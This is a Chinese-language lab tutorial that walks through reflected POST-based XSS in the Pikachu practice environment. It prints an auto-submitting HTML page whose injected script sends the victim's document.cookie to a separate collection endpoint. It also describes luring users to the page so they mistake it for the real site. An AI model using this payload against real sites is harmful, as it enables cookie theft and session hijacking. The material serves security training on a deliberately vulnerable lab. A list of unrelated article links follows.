5.XSS-反射型(post)利用:获取cookie

原理:

文件路径:\pikachu\pkxss\xcookie\post.html

将post.html文件,复制到皮卡丘的根路径下或者根下随意路径即可,并编辑文件

需要修改以下两个地址,第一个地址是将原界面的样子链接过来,让用户认为是原界面,第二个是将cookie从数据库中提取出来的程序(注意和自己的目录相对应)

基于域名配置文件

基于IP地址配置文件

powershell 复制代码
<html>
<head>
<script>
window.onload = function() {
  document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://192.168.30.168/pikachu/vul/xss/xsspost/xss_reflected_post.php">
    <input id="xssr_in" type="text" name="message" value=
    "<script>
document.location = 'http://192.168.30.168/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;
	</script>"
	 />
    <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>

然后将url:www.pikachu.net/post.html发给用户访问,会直接跳转到post型链接上;

用户误以为是正常网站去访问

在pkxss平台直接获取用户信息

相关推荐
汉堡go18 分钟前
python_chapter6
前端·数据库·python
wusp199424 分钟前
v-model 和 :value 的深度解析
前端·javascript·vue.js
Code知行合壹30 分钟前
Vue项目中SVG图标
前端·vue.js
SJLoveIT33 分钟前
【安全研发】CSRF (跨站请求伪造) 深度复盘与防御体系
前端·安全·csrf
小二·42 分钟前
Python Web 开发进阶实战:数字孪生平台 —— 在 Flask + Vue 中构建实时物理世界镜像
前端·vue.js·python
CHU72903544 分钟前
安心陪伴,便捷就医:陪诊代办小程序的温暖设计
前端·小程序·php
ashcn20011 小时前
websocket测试通信
前端·javascript·websocket
weixin_404679311 小时前
edge alt tab怎么关
前端·edge
CHU7290351 小时前
线上扭蛋机拆盒小程序前端功能版块解析
前端·小程序·php
卿着飞翔1 小时前
Vue使用yarn进行管理
前端·javascript·vue.js